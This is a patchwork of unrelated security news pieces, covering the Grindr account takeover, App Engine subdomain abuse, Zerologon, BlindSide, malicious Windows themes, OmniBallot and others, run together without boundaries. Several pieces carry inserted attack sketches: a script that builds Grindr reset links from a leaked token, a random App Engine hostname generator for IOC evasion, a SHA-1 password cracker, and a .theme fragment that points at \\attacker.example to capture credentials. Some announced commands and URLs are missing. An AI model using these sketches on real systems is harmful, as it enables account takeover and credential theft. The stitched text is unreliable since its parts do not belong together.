Grindr, one of the world’s largest dating and social networking apps for gay, bi, trans, and queer people, has fixed a security vulnerability that allowed anyone to hijack and take control of any user’s account using only their email address.
Wassime Bouimadaghene, a French security researcher, found the vulnerability and reported the issue to Grindr. When he didn’t hear back, Bouimadaghene shared details of the vulnerability with security expert Troy Hunt for help getting it addressed.
The vulnerability was fixed a short time later.
Hunt tested and confirmed the vulnerability with help from a test account set up by Scott Helme, and shared his findings with TechCrunch.
Bouimadaghene found the vulnerability in how the app handles account password resets.
To reset a password, Grindr sends the user an email with a clickable link containing an account password reset token. Once clicked, the user can change their password and is allowed back into their account.
But Bouimadaghene found that Grindr’s password reset page was leaking password reset tokens to the browser. That meant anyone who knew a user’s registered email address could trigger a password reset and collect the reset token from the browser’s response, if they knew where to look.
Secret tokens used to reset Grindr account passwords, which are only supposed to be sent to a user’s inbox, were leaking to the browser. (Image: Troy Hunt/supplied)
The clickable link that Grindr generates for a password reset is formatted in a predictable way, meaning a malicious user could easily craft their own clickable password reset link – identical to the one sent to the user’s inbox – using the password reset token leaked to the browser.
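In effect, the reset flow collapsed to a few lines of attacker-side logic. The sketch below is purely illustrative: the real Grindr endpoint, response format, field name, and URL layout were not published, so every identifier here is a hypothetical stand-in.

```python
import json

# Hypothetical response body from the password-reset endpoint; the real
# field names were not published. The token should never have appeared here.
leaked_body = '{"resetToken": "a1b2c3d4e5"}'
token = json.loads(leaked_body)["resetToken"]

# Craft the same reset link that was emailed to the victim (illustrative URL).
reset_url = f"https://www.grindr.com/password-reset?token={token}"
print(reset_url)
```

With that link in hand, no access to the victim’s inbox is needed at all.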
With that crafted link, the malicious user can reset the account owner’s password and gain access to their account and the personal data stored within, including account photos, messages, sexual orientation and HIV status and last test date.
“This is one of the most basic account takeover techniques I’ve seen,” Hunt wrote.
A newly discovered technique by a researcher shows how Google’s App Engine domains can be abused to deliver phishing and malware while remaining undetected by leading enterprise security products.
Google App Engine is a cloud-based service platform for developing and hosting web apps on Google’s servers.
While reports of phishing campaigns leveraging enterprise cloud domains are nothing new, what makes Google App Engine infrastructure risky is how its subdomains are generated and paths are routed.
Practically unlimited subdomains for one app
Typically scammers use cloud services to create a malicious app that gets assigned a subdomain. They then host phishing pages there. Or they may use the app as a command-and-control (C2) server to deliver a malware payload.
But the URL structures are usually generated in a manner that makes them easy to monitor and block using enterprise security products, should there be a need.
For example, a malicious app hosted on Microsoft Azure services may have a URL structure like: https://example-subdomain.app123.web.core.windows.net/…
Therefore, a cybersecurity professional could block traffic to and from this particular app by simply blocking requests to and from this subdomain. This wouldn’t prevent communication with the rest of the Microsoft Azure apps that use other subdomains.
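That kind of rule is a simple hostname comparison. A minimal sketch of such a blocklist check (the helper name is ours; the hostname is the article’s example):

```python
from urllib.parse import urlsplit

# Subdomain of the one malicious app (from the example above).
BLOCKED_HOSTS = {"example-subdomain.app123.web.core.windows.net"}

def is_blocked(url: str) -> bool:
    # Other Azure apps live on other subdomains, so they still pass.
    return urlsplit(url).hostname in BLOCKED_HOSTS

print(is_blocked("https://example-subdomain.app123.web.core.windows.net/login"))  # True
print(is_blocked("https://another-app.web.core.windows.net/"))                    # False
```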
It gets a bit more complicated, however, in the case of Google App Engine.
Security researcher Marcel Afrahim demonstrated that an intended design feature of Google App Engine’s subdomain generator can be abused to use the app infrastructure for malicious purposes, all while remaining undetected.
Google’s appspot.com domain, which hosts apps, has the following URL structure: https://VERSION-dot-SERVICE-dot-PROJECT_ID.REGION_ID.r.appspot.com
A subdomain, in this case, does not represent just an app; it encodes the app’s version, the service name, the project ID, and the region ID.
But the most important point to note here is that if any of those fields are incorrect, Google App Engine won’t show a 404 Not Found page, but will instead serve the app’s “default” page (a behavior referred to as soft routing).
“Requests are received by any version that is configured for traffic in the targeted service. If the service that you are targeting does not exist, the request gets Soft Routed,” states Afrahim, adding:
“If a request matches the PROJECT_ID.REGION_ID.r.appspot.com portion of the hostname, but includes a service, version, or instance name that does not exist, then the request is routed to the default service, which is essentially your default hostname of the app.”
Essentially, this means there are a lot of permutations of subdomains to get to the attacker’s malicious app. As long as every subdomain has a valid “project_ID” field, invalid variations of other fields can be used at the attacker’s discretion to generate a long list of subdomains, which all lead to the same app.
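To see the scale of the problem, consider generating hostnames of the form VERSION-dot-SERVICE-dot-PROJECT_ID.REGION_ID.r.appspot.com with garbage in every field except the project ID. A sketch with a hypothetical project ID:

```python
import random
import string

# Hypothetical project ID -- the only part of the hostname that must be
# valid for soft routing to deliver the request to the attacker's app.
PROJECT_ID = "evil-app-123456"
REGION_ID = "uc"

def random_label(n: int = 8) -> str:
    return "".join(random.choices(string.ascii_lowercase + string.digits, k=n))

# Bogus version/service labels still soft-route to the default service,
# so every one of these hostnames reaches the same app.
hosts = [
    f"{random_label()}-dot-{random_label()}-dot-{PROJECT_ID}.{REGION_ID}.r.appspot.com"
    for _ in range(5)
]
for h in hosts:
    print(h)
```

Each run produces a fresh set of working hostnames, which is exactly what makes hostname-based blocklists futile here.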
For example, as shown by Afrahim, the two URLs below, which look drastically different, represent the same app hosted on Google App Engine.
“Verified by Google Trust Services” means trusted by everyone
The fact that a single malicious app is now represented by multiple permutations of its subdomains makes it hard for sysadmins and security professionals to block malicious activity.
But further, to a technologically unsavvy user, all of these subdomains would appear to be a “secure site.” After all, the appspot.com domain and all its subdomains come with the seal of “Google Trust Services” in their SSL certificates.
Google App Engine sites showing valid SSL certificate with “Verified by: Google Trust Services” text
Source: Afrahim
Even further, most enterprise security solutions such as Symantec WebPulse web filter automatically allow traffic to trusted category sites. And Google’s appspot.com domain, due to its reputation and legitimate corporate use cases, earns an “Office/Business Applications” tag, skipping the scrutiny of web proxies.
Automatically trusted by most enterprise security solutions
On top of that, the large number of subdomain variations renders the blocking approach based on Indicators of Compromise (IOCs) useless.
A screenshot of a test app created by Afrahim along with a detailed “how-to” demonstrates this behavior in action.
In the past, Cloudflare domain generation had a similar design flaw that Astaroth malware would exploit via the following command when fetching its stage-2 payload:
This would essentially launch a Windows command prompt and substitute a random number for %RANDOM%, making the payload URL truly dynamic.
“And now you have a script that downloads the payload from different URL hostnames each time is run and would render the network IOC of such hypothetical sample absolutely useless. The solutions that rely on single run on a sandbox to obtain automated IOC would therefore get a new Network IOC and potentially new file IOC if script is modified just a bit,” said the researcher.
Delivering malware via Google App Engine subdomain variations while bypassing IOC blocks
Actively exploited for phishing attacks
Security engineer and pentester Yusuke Osumi tweeted last week that a Microsoft phishing page hosted on an appspot.com subdomain was exploiting the design flaw Afrahim detailed.
Osumi additionally compiled a list of over 2,000 subdomains generated dynamically by the phishing app—all of them leading to the same phishing page.
Active exploitation of Google App Engine subdomains in phishing attacks
Source: Twitter
This recent example has shifted the focus of discussion from how Google App Engine’s flaw can be potentially exploited to active phishing campaigns leveraging the design flaw in the wild.
“Use a Google Drive/Service phishing kit on Google’s App Engine and normal user would not just realize it is not Google which is asking for credentials,” concluded Afrahim in his blog post.
Twitter is notifying developers today about a possible security incident that may have impacted their accounts.
The incident was caused by incorrect instructions that the developer.twitter.com website sent to users’ browsers.
The developer.twitter.com website is the portal where developers manage their Twitter apps and attached API keys, but also the access token and secret key for their Twitter account.
In an email sent to developers today, Twitter said that its developer.twitter.com website told browsers to create and store copies of the API keys, account access token, and account secret inside their cache, a section of the browser where data is saved to speed up the process of loading the page when the user accessed the same site again.
This might not be a problem for developers using their own browsers, but Twitter is warning developers who may have used public or shared computers to access the developer.twitter.com website — in which case, their API keys are now most likely stored in those browsers.
“If someone who used the same computer after you in that temporary timeframe knew how to access a browser’s cache, and knew what to look for, it is possible they could have accessed the keys and tokens that you viewed,” Twitter said.
“Depending on what pages you visited and what information you looked at, this could have included your app’s consumer API keys, as well as the user access token and secret for your own Twitter account,” Twitter said.
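The usual fix for this class of bug is to mark any page that renders secrets as uncacheable. The headers below are the standard HTTP way to do that; they are illustrative, not taken from Twitter’s actual fix:

```python
# HTTP response headers that instruct browsers (and intermediaries) not
# to cache a page containing secrets. Illustrative only -- not taken
# from Twitter's actual configuration.
SENSITIVE_PAGE_HEADERS = {
    "Cache-Control": "no-store, no-cache, must-revalidate",
    "Pragma": "no-cache",   # legacy HTTP/1.0 caches
    "Expires": "0",
}

for name, value in SENSITIVE_PAGE_HEADERS.items():
    print(f"{name}: {value}")
```

With `no-store` in place, a shared browser has nothing on disk for the next user to dig out.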
Netgear has decided that users of some of its managed network switches don’t need access to the equipment’s full user interface – unless they register their details with Netgear first.
For instance, owners of its 64W Power-over-Ethernet eight-port managed gigabit switch GC108P, and its 126W variant GC108PP, need to hand over information about themselves to the Netgear Cloud to get full use out of the devices.
“Starting from firmware version 1.0.5.4, product registration is required to unlock full access to the local browser user interface,” said the manufacturer in a note on its website referencing a version released in April this year.
The latest build, 1.0.5.8, released last week, continues that registration requirement. These rules also appear to apply to a dozen or so models of Netgear’s kit, including its GS724TPP 24-port managed Ethernet switch.
“I recently bought a couple of Netgear Managed Switches for business, and in their datasheet they list local-only management as a feature. Only after they arrived we discovered that you only get limited functionality in the local-only management mode, you have to register the switches to your Netgear Cloud account to get access to the full functionality,” fumed one netizen on a Hacker News discussion thread. “I would not have bought the switches if I had knew I needed to register them to Netgear Cloud to have access to the full functionality specified in the data sheet.”
It appears the Silicon Valley giant is aware that not everyone will rush to create a cloud account to manage their network hardware because it has published a list of functions that one can freely access without said registration – for now, anyway.
We’ve asked Netgear to explain the move. The manufacturer most recently made the headlines when, after being informed of a security flaw in a large number of product lines, it promptly abandoned half of them rather than issue a patch.
Professor Alan Woodward of the University of Surrey, England, opined: “It’s a conundrum because it is software and you do have only a licence to use it: you don’t own it so one might argue this helps protect intellectual property rights. However, that’s different for the hardware which is pretty useless without the software.”
Woodward pointed to Netgear’s online privacy policy, which, like that of every other company on the internet, states that data from customers and others can be hoovered up for marketing purposes, research and so on (see section 11).
Microsoft has released Sysmon 12, and it comes with a useful feature that logs and captures any data added to the Windows Clipboard.
This feature can help system administrators and incident responders track the activities of malicious actors who compromised a system.
For those not familiar with Sysmon, otherwise known as System Monitor: it is a Sysinternals tool that monitors Windows systems for malicious activity and logs it to the Windows event log.
Sysmon 12 adds clipboard capturing
With the release of Sysmon 12, users can now configure the utility to generate an event every time data is copied to the Clipboard. The Clipboard data is also saved to files that are only accessible to an administrator for later examination.
As most attackers will utilize the Clipboard when copying and pasting long commands, monitoring the data stored in the Clipboard can provide useful insight into how an attack was conducted.
Once you have downloaded Sysmon, run it from an elevated command prompt, as it needs administrative privileges to run.
Simply running Sysmon.exe without any arguments will display a help screen, and for more detailed information, you can go to the Sysinternals’ Sysmon page.
Sysmon 12 help
Without any configuration, Sysmon will monitor basic events such as process creation and file time changes.
It is possible to configure it to log many other types of information by creating a Sysmon configuration file, which we will do to enable the new ‘CaptureClipboard’ directive.
For a very basic setup that will enable Clipboard logging and capturing, you can use the configuration file below:
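The configuration file itself is a small XML document. A minimal version along these lines (assuming Sysmon schema version 4.40; the exact file pictured in the original article may differ slightly):

```xml
<Sysmon schemaversion="4.40">
  <!-- Save clipboard contents to protected files under C:\Sysmon -->
  <CaptureClipboard/>
  <EventFiltering>
    <RuleGroup name="" groupRelation="or">
      <!-- onmatch="exclude" with no rules inside: log every clipboard change -->
      <ClipboardChange onmatch="exclude"/>
    </RuleGroup>
  </EventFiltering>
</Sysmon>
```

Saved as sysmon.cfg.xml, it matches the start command shown below.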
Configuration file enabling the CaptureClipboard feature
To start Sysmon and direct it to use the above configuration file, you would enter the following command from an elevated command prompt:
sysmon -i sysmon.cfg.xml
Once started, Sysmon will install its driver and begin collecting data quietly in the background.
All Sysmon events will be logged to ‘Applications and Services Logs/Microsoft/Windows/Sysmon/Operational‘ in the Event Viewer.
With the CaptureClipboard feature enabled, when data is copied into the Clipboard it will generate an ‘Event 24 – Clipboard Changed’ entry in Event Viewer, as shown below.
Event 24 – Clipboard Changed
The event log entry will display what process stored the data in the clipboard, the user who copied it, and when it was done. It will not, though, show the actual data that was copied.
The copied data is instead saved to the protected C:\Sysmon folder in files named CLIP-SHA1_HASH, where the hash is the one shown in the event above.
For example, the event displayed above would have the Clipboard contents stored in the C:\Sysmon\CLIP-CC849193D18FF95761CD8A702B66857F329BE85B file.
This C:\Sysmon folder is protected with a System ACL, and to access it, you need to download the psexec.exe program and launch a cmd prompt with System privileges using the following command:
psexec -sid cmd
After the new System command prompt is launched, you can go into the C:\Sysmon folder to access the saved Clipboard data.
Protected C:\Sysmon folder
When opening the CLIP-CC849193D18FF95761CD8A702B66857F329BE85B file, you can see that it contains a PowerShell command that I copied into the clipboard from Notepad.exe.
Capture Clipboard data
This PowerShell command is used to clear Shadow Volume Copies in Windows, which can be used by an attacker who wants to make it harder to restore deleted data.
Having this information illustrates how useful this feature can be when performing incident response.
Another useful feature added in Sysmon 11 will automatically create backups of deleted files, allowing administrators to recover files used in an attack.
Last month, Microsoft patched a very interesting vulnerability that would allow an attacker with a foothold on your internal network to essentially become Domain Admin with one click. All that is required is for a connection to the Domain Controller to be possible from the attacker’s viewpoint.
Secura’s security expert Tom Tervoort previously discovered a less severe Netlogon vulnerability last year that allowed workstations to be taken over, but the attacker required a Person-in-the-Middle (PitM) position for that to work. Now, he discovered this second, much more severe (CVSS score: 10.0) vulnerability in the protocol. By forging an authentication token for specific Netlogon functionality, he was able to call a function to set the computer password of the Domain Controller to a known value. After that, the attacker can use this new password to take control over the domain controller and steal credentials of a domain admin.
The vulnerability stems from a flaw in a cryptographic authentication scheme used by the Netlogon Remote Protocol, which among other things can be used to update computer passwords. This flaw allows attackers to impersonate any computer, including the domain controller itself, and execute remote procedure calls on their behalf.
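The cryptographic flaw at the heart of Zerologon, per Secura’s whitepaper, is that Netlogon’s ComputeNetlogonCredential uses AES-CFB8 with a fixed all-zero initialization vector. For roughly one key in 256, an all-zero input then encrypts to an all-zero output, so an attacker who keeps retrying with zeroed challenges will eventually authenticate. The Python sketch below illustrates that property of the CFB8 structure using a stand-in PRF rather than real AES (and none of the actual Netlogon protocol):

```python
import hashlib
import os

def prf(key: bytes, block: bytes) -> bytes:
    # Stand-in for the AES block cipher, purely to illustrate the CFB8
    # structure (this is NOT real AES and NOT the Netlogon protocol).
    return hashlib.sha256(key + block).digest()[:16]

def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    state = iv
    out = bytearray()
    for pt_byte in plaintext:
        ks_byte = prf(key, state)[0]          # first keystream byte
        ct_byte = pt_byte ^ ks_byte
        out.append(ct_byte)
        state = state[1:] + bytes([ct_byte])  # shift the ciphertext byte in
    return bytes(out)

# With a fixed all-zero IV and an all-zero 8-byte challenge, the entire
# ciphertext comes out all zeros whenever the first keystream byte is
# zero -- about 1 key in 256. An attacker can simply retry new sessions
# until that happens.
trials, hits = 20000, 0
for _ in range(trials):
    if cfb8_encrypt(os.urandom(16), bytes(16), bytes(8)) == bytes(8):
        hits += 1
print(f"all-zero ciphertext rate: {hits / trials:.4f}")  # ~1/256 ≈ 0.0039
```

A correct design would use a fresh random IV per encryption, which removes the attacker’s ability to force this degenerate state.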
Secura urges everybody to install the patch on all their domain controllers as fast as possible; please refer to Microsoft’s advisory. We have published a test tool on GitHub (https://github.com/SecuraBV/CVE-2020-1472) that can tell you whether a domain controller is vulnerable or not.
If you are interested in the technical details behind this pretty unique vulnerability and how it was discovered, download the whitepaper here.
In August, security researcher Volodymyr Diachenko discovered a misconfigured Elasticsearch cluster, owned by gaming hardware vendor Razer, exposing customers’ PII (Personal Identifiable Information).
The cluster contained records of customer orders and included information such as item purchased, customer email, customer (physical) address, phone number, and so forth—basically, everything you’d expect to see from a credit card transaction, although not the credit card numbers themselves. The Elasticsearch cluster was not only exposed to the public, it was indexed by public search engines.
[…]
One of the things Razer is well-known for—aside from their hardware itself—is requiring a cloud login for just about anything related to that hardware. The company offers a unified configuration program, Synapse, which uses one interface to control all of a user’s Razer gear.
Until last year, Synapse would not function—and users could not configure their Razer gear, for example change mouse resolution or keyboard backlighting—without logging in to a cloud account. Current versions of Synapse allow locally stored profiles for off-Internet use and what the company refers to as “Guest mode” to bypass the cloud login.
Many gamers are annoyed by the insistence on a cloud account for hardware configuration that doesn’t seem to really be enhanced by its presence. Their pique is understandable, because the pervasive cloud functionality comes with cloud vulnerabilities. Over the last year, Razer awarded a single HackerOne user, s3cr3tsdn, 28 separate bounties.
We applaud Razer for offering and paying bug bounties, of course, but it’s difficult to forget that those vulnerabilities wouldn’t have been there (and globally exploitable), if Razer hadn’t tied their device functionality so thoroughly to the cloud in the first place.
The database built by Shenzhen Zhenhua from a variety of sources is technically complex, using very advanced language, targeting, and classification tools. Shenzhen Zhenhua claims to work with Chinese intelligence, military, and security agencies, which use the open information environment we in open liberal democracies take for granted to target individuals and institutions. Our research broadly supports these claims.
The information specifically targets influential individuals and institutions across a variety of industries – from politics to organized crime to technology and academia, to name just a few. The database draws from sectors the Chinese state and linked enterprises are known to target.
The breadth of the data is also staggering. It compiles information on everyone from key public figures to low-level individuals in an institution, the better to monitor them and understand how to exert influence when needed.
Compiling public and non-public personal and institutional data, Shenzhen Zhenhua has likely broken numerous laws in foreign jurisdictions. Claiming to partner with state intelligence and security services in China, Shenzhen Zhenhua operates collection centers in foreign countries that should be considered for investigation in those jurisdictions.
The personal details of millions of people around the world have been swept up in a database compiled by a Chinese tech company with reported links to the country’s military and intelligence networks, according to a trove of leaked data.
About 2.4 million people are included in the database, assembled mostly based on public open-source data such as social media profiles, analysts said. It was compiled by Zhenhua Data, based in the south-eastern Chinese city of Shenzhen.
Internet 2.0, a cybersecurity consultancy based in Canberra whose customers include the US and Australian governments, said it had been able to recover the records of about 250,000 people from the leaked dataset, including about 52,000 Americans, 35,000 Australians and nearly 10,000 Britons. They include politicians, such as prime ministers Boris Johnson and Scott Morrison and their relatives, the royal family, celebrities and military figures.
When contacted by the Guardian for comment, a representative of Zhenhua said: “The report is seriously untrue.”
“Our data are all public data on the internet. We do not collect data. This is just a data integration. Our business model and partners are our trade secrets. There is no database of 2 million people,” said the representative surnamed Sun, who identified herself as head of business.
“We are a private company,” she said, denying any links to the Chinese government or military. “Our customers are research organisations and business groups.”
Three “grumpy old hackers” in the Netherlands managed to access Donald Trump’s Twitter account in 2016 by extracting his password from the 2012 Linkedin hack.
The pseudonymous, middle-aged chaps, named only as Edwin, Mattijs and Victor, told reporters they had lifted Trump’s particulars from a database being passed around among hackers, and tried the credentials on his account.
To their considerable surprise, the password – but not the email address associated with @realdonaldtrump – worked the first time they tried it, with Twitter’s login process confirming the password was correct.
The explosive allegations were made by Vrij Nederland (VN), a Dutch magazine founded during WWII as part of the Dutch resistance to Nazi German occupation.
“A digital treasure chest with 120 million usernames and hashes of passwords. It was the spoil of a 2012 digital break-in,” wrote VN journalist Gerard Janssen, describing the LinkedIn database hack. After the networking website for suits was hacked in 2012 by a Russian miscreant, the database found its way onto the public internet in 2016 when researchers eagerly pored over the hashes. Critically, the leaked database included 6.5 million hashed but unsalted passwords.
Poring over the database, the trio found an entry for Trump as well as the hash of Trump’s password: 07b8938319c267dcdb501665220204bbde87bf1d. Using John the Ripper, a password-cracking tool, they were able to recover one of the Orange One’s login credentials. Some considerable searching revealed the correct email address (twitter@donaldjtrump.com – different from the one Trump used on LinkedIn, which was revealed in the hack)… only for the “middle-aged” hackers to be thwarted by Twitter, which detected that the man who would become the 45th president of the United States had previously logged in from New York.
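Reversing an unsalted SHA-1 hash is just a dictionary walk: hash each candidate and compare. A stdlib-only sketch of the idea, using a made-up target hash generated in the example itself, not the hash from the leak:

```python
import hashlib

def sha1_hex(password: str) -> str:
    return hashlib.sha1(password.encode()).hexdigest()

# Made-up target for illustration -- generated here, not the leaked hash.
target = sha1_hex("letmein123")

# Without a per-user salt, one pass over a wordlist cracks every
# matching account in the dump at once.
wordlist = ["password", "qwerty", "letmein123", "dragon"]
cracked = next((w for w in wordlist if sha1_hex(w) == target), None)
print(cracked)  # letmein123
```

Tools like John the Ripper do exactly this, just with far larger wordlists, mangling rules, and GPU acceleration.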
One open proxy server later, they were in.
VN published screenshots supplied by the three showing a browser seemingly logged into Trump’s Twitter account, displaying a tweet dating from 27 October 2016 referring to a speech Trump delivered in Charlotte, North Carolina, USA.
Despite trying to alert the American authorities to just how insecure Trump’s account was (no multi-factor authentication, a password recycled from an earlier breach), the hackers got nowhere. In desperation they finally tried the Netherlands’ National Cyber Security Centrum, which acknowledged receipt of the breach report the increasingly concerned men had prepared as soon as they realised their digital trail was not particularly well covered.
“In short, the grumpy old hackers must set a good example. And to do it properly with someone they ‘may not really like’ they think this is a good example of a responsible disclosure, the unsolicited reporting of a security risk,” concluded VN’s Janssen.
Professor Alan Woodward of the University of Surrey added: “It’s password hygiene 101: use a different password for each account. And, if you know a password has been compromised in a previous breach (I think LinkedIn is well known) then for goodness sake, don’t use that one. [This is] a textbook example of credential stuffing.”
Boffins in America, the Netherlands, and Switzerland have devised a Spectre-style attack on modern processors that can defeat defenses that are supposed to stop malicious software from hijacking a computer’s operating system. The end result is exploit code able to bypass a crucial protection mechanism and take over a device to hand over root access.
That’s a lot to unpack so we’ll start from the top. Let’s say you find a security vulnerability, such as a buffer overflow, in the kernel of an OS like Linux. Your aim is to use this programming flaw to execute code within the kernel so that you can take over the whole machine or device. One way to do this, and sidestep things like stack cookies and the prevention of data execution, is to use return-orientated programming (ROP). This involves chaining together snippets of instruction sequences in the kernel to form an ad-hoc program that does whatever you want: hand control of the machine to you, for example.
To thwart ROP-based exploits, a defense called Address Space Layout Randomization (ASLR) was devised some years back that, as the name suggests, randomizes the locations of an application or operating system kernel’s code and libraries in memory. That makes it difficult to write working ROP exploits as the snippets of code they need aren’t in their expected locations; they are randomly placed during boot. Some information needs to be leaked from the kernel that reveals the current layout of its components in RAM. If a ROP exploit just guesses the kernel’s layout and is wrong, it will trigger a crash, and this can be detected and acted on by an administrator.
Enter Spectre. This is the family of vulnerabilities that can be exploited by malware or a rogue user to obtain secret, privileged information – such as passwords and keys – by taking advantage of speculative execution, which is when a processor performs an operation before it’s needed and either retains or tosses the result, depending on the processor instructions ultimately executed.
What the team say they’ve done is design a Spectre-style technique that can silently and speculatively probe memory to determine the location of the kernel’s parts without triggering a crash. And that makes a blind return-oriented programming (BROP) attack possible, bypassing any ASLR in the way.
Hijack merchant
The technique, dubbed BlindSide, is explained in a paper [PDF] by Enes Göktaş and Georgios Portokalidis (Stevens Institute of Technology), Herbert Bos and Cristiano Giuffrida (Vrije Universiteit Amsterdam), and Kaveh Razavi (ETH Zürich). Scheduled to be presented at the ACM Conference on Computer and Communications Security (CCS) 2020, it involves memory-corruption-based speculative control-flow hijacking.
“Using speculative execution for crash suppression allows the elevation of basic memory write vulnerabilities into powerful speculative probing primitives that leak through microarchitectural side effects,” the paper stated. “Such primitives can repeatedly probe victim memory and break strong randomization schemes without crashes and bypass all deployed mitigations against Spectre-like attacks.”
The basic memory write vulnerability in this case was a heap buffer overflow patched some time ago in the Linux kernel (CVE-2017-7308). But the boffins insist other vulnerabilities that provide access to a write primitive, such as CVE-2017-1000112, CVE-2017-7294, and CVE-2018-5332, would work too. So to be clear: you need to find an unpatched hole in the kernel, get some kind of code execution on the machine in question, and then deploy the BROP technique with an exploit to gain root privileges.
The boffins show that they can break KASLR (Kernel ASLR) to run an ROP exploit; leak the root password hash; and undo fine-grained randomization (FGR) and kernel execute-only memory (XoM) protections to access the entire kernel text and perform an ROP exploit.
A video of one such attack shows that the technique takes a few minutes, but does manage to elevate the user to root privileges:
The computer scientists confirmed their technique on Linux kernel version 4.8.0 compiled with gcc and all mitigations enabled on a machine with an Intel Xeon E3-1270 v6 processor clocked at 3.80GHz with 16GB of RAM.
They also did so on Linux kernel version 5.3.0-40-generic with all the mitigations (e.g., Retpoline) enabled on an Intel i7-8565U chip (Whiskey Lake) with the microcode update for the IBPB, IBRS and STIBP mitigations. What’s more, the technique worked on Intel Xeon E3-1505M v5, Xeon E3-1270 v6 and Core i9-9900K CPUs (Skylake, Kaby Lake, and Coffee Lake) and on AMD Ryzen 7 2700X and Ryzen 7 3700X CPUs (Zen+ and Zen2).
“Overall, our results confirm speculative probing is effective on a modern Linux system on different microarchitectures, hardened with the latest mitigations,” the paper stated.
Potential mitigations involve preventing, detecting, and hindering speculative probing, but none of these approaches, the authors suggest, can deal with the issue very well. Intel and AMD did not immediately respond to requests for comment.
Windows 10 users can customize their desktops with unique themes, and are able to create and share those themes with others. Hackers can also use them to steal your credentials.
A flaw in Windows 10’s theme-creation feature lets hackers modify custom themes that, once installed, trick users into passing over their Microsoft account name and password data via counterfeit login pages. This technique wouldn’t necessarily raise any red flags for an average person, as some legit Windows 10 themes have you sign in after installation.
This “Pass the Hash” attack doesn’t steal your password verbatim, but rather the password hash—a jumbled up and obfuscated version of your password’s data. Companies hash password data to keep it more secure when stored on remote servers, but hackers can unscramble passwords with readily available software. In some cases, passwords can be cracked in just a few seconds.
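In the technique Bayne described, the lure is the theme file itself: an INI-style .theme file whose wallpaper points at a resource on an attacker-controlled server that demands authentication, prompting Windows to send the hashed credentials. The fragment below is a hypothetical illustration (made-up server and path):

```ini
; Illustrative malicious theme fragment (hypothetical server and path).
; Pointing the wallpaper at a remote resource that demands
; authentication causes Windows to transmit the user's credentials.
[Control Panel\Desktop]
Wallpaper=\\attacker.example\share\wallpaper.jpg
```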
This vulnerability was discovered by cybersecurity researcher Jimmy Bayne, who publicly disclosed the findings in a Twitter thread.
Bayne alerted Microsoft to the security risk, but the company says it has no plans to change the Theme feature, since the credential passing is an intended feature; hackers have simply found a way to use it maliciously.
With no official action being taken, it’s up to users to keep themselves safe from shady Windows 10 themes.
BleepingComputer and Bayne outline options for enterprise versions of Windows 10, but these won’t work for general users. The smartest move is to avoid custom themes entirely, but if you keep using them, make sure you’re only downloading official themes from secure sources like the Windows Store.
Whether you keep using custom themes or not, you should also update your accounts with unique passwords, turn on two-factor authentication, and use an encrypted password manager. I would also suggest unlinking third-party accounts from your Microsoft account and using local user accounts to sign in to your PC, rather than your Microsoft Account. Protective steps like these make it harder for outsiders to steal your data, even if they happen to snag a password.
The coronavirus pandemic has forced people around the globe to temporarily change how they go about everyday activities, political elections and campaigning included.
Since the virus hit in an election year, it’s highly likely new measures will be taken to prevent mass gatherings during voting. Infection rates aren’t likely to drop any time soon, and even if they did, queues for voting could lead to huge bursts of cases everywhere. At least 15 states in the US postponed presidential election primaries.
Election administrators have suggested falling back on an analog method: voting by mail, in which voters return their ballots through the postal system. If that technique is used at scale, the results of the election would likely not be known for weeks, or even months.
Because of the pandemic, new voter registrations have dropped tremendously, down 70% across twelve states. This year’s election was expected to break previous turnout records; with lockdowns still in place, participation now looks likely to fall instead.
There have also been calls for online voting in some states like New Jersey, Delaware, and West Virginia. Currently, election administrators are holding discussions on the best method to use that would combine voting efficiency, safe health practices, and a speedy turnout of results.
OmniBallot – Security Vulnerabilities
The option most widely touted is OmniBallot, a web-based ballot delivery, marking, and return system used primarily by disabled, military, and overseas voters. The system has, however, come under scrutiny from several quarters regarding its credibility.
In a paper released by Michael Specter, a researcher at the Massachusetts Institute of Technology (MIT), and J. Alex Halderman, of the University of Michigan, the pair highlighted several security vulnerabilities inherent in the system and labelled it insecure on multiple levels. Their study examined three main ways the system is used, namely:
Online Ballot Return: One issue stems from the system’s reliance on several third-party services, which could deliver altered results and rob the system of its independence and reliability. The risks associated with online ballot return are considered grave, since a vote returned online can be altered by malware on the voter’s device or through a database compromise.
Blank Ballot Delivery: Although considered a moderate risk, since rigorous electoral screening can catch it, blank ballot delivery is still a concern: voters could be sent ballots that arrive blank or with some candidates omitted.
Online Ballot Marking Manipulation: Here, attackers learn the voters’ choices and either alter them or redirect the votes to a different candidate. This is tagged as a high-risk vulnerability and is ultimately one of the reasons the system is not recommended for use.
Mitigating Online Risks when “going to the polls”
While vulnerabilities like these are ultimately the government’s to fix, there are steps voters themselves can take to protect their votes from alteration.
Use Encryption Software: Encryption adds an extra layer of security to data sent over the Internet. Public WiFi networks, which many of us rely on, often have malicious actors lurking somewhere on the network waiting to steal user data. To mitigate this risk, download and use a VPN app whenever you connect over an untrusted network.
Educate Yourself: The government often releases guidelines on best practices for using an online voting system. Engage in voter education and educate the people around you. For example, make sure you are on the official voting website rather than a look-alike site set up to mislead voters.
Use Antivirus Software: Malware is one of the main tools cyber criminals use against online voters. Reputable antivirus software can detect, scan for, and remove suspicious or corrupted programs that might be present on your system.
The United States Court of Appeals for the Ninth Circuit has ruled [PDF] that the National Security Agency’s phone-call slurping was indeed naughty, seven years after former contractor Edward Snowden blew the whistle on the tawdry affair.
It’s been a long time coming, and while some might view the decision as a slap for officials that defended the practice, the three-judge panel said the part played by the NSA programme wasn’t sufficient to undermine the convictions of four individuals for conspiring to send funds to Somalia in support of a terrorist group.
Snowden made public the existence of the NSA data collection programmes in June 2013, and by June 2015 US Congress had passed the USA FREEDOM Act, “which effectively ended the NSA’s bulk telephony metadata collection program,” according to the panel.
The panel took a long, hard look at the metadata collection programme, which slurped the telephony of millions of Americans (as well as at least one of the defendants) and concluded that not only had the Fourth Amendment of the constitution likely been violated, it certainly flouted section 1861 of the Foreign Intelligence Surveillance Act (FISA), which deals with access to business records in foreign intelligence and international terrorism investigations.
“On the merits,” the ruling said, “the panel held that the metadata collection exceeded the scope of Congress’s authorization in 50 U.S.C. § 1861, which required the government to make a showing of relevance to a particular authorized investigation before collecting the records, and that the program therefore violated that section of FISA.”
So, both illegal and quite possibly unconstitutional.
It isn’t a good look for the intelligence services. The panel was able to study the classified records and noted that “the metadata did not and was not necessary to support the requisite probable cause showing for the FISA Subchapter I warrant application in this case.”
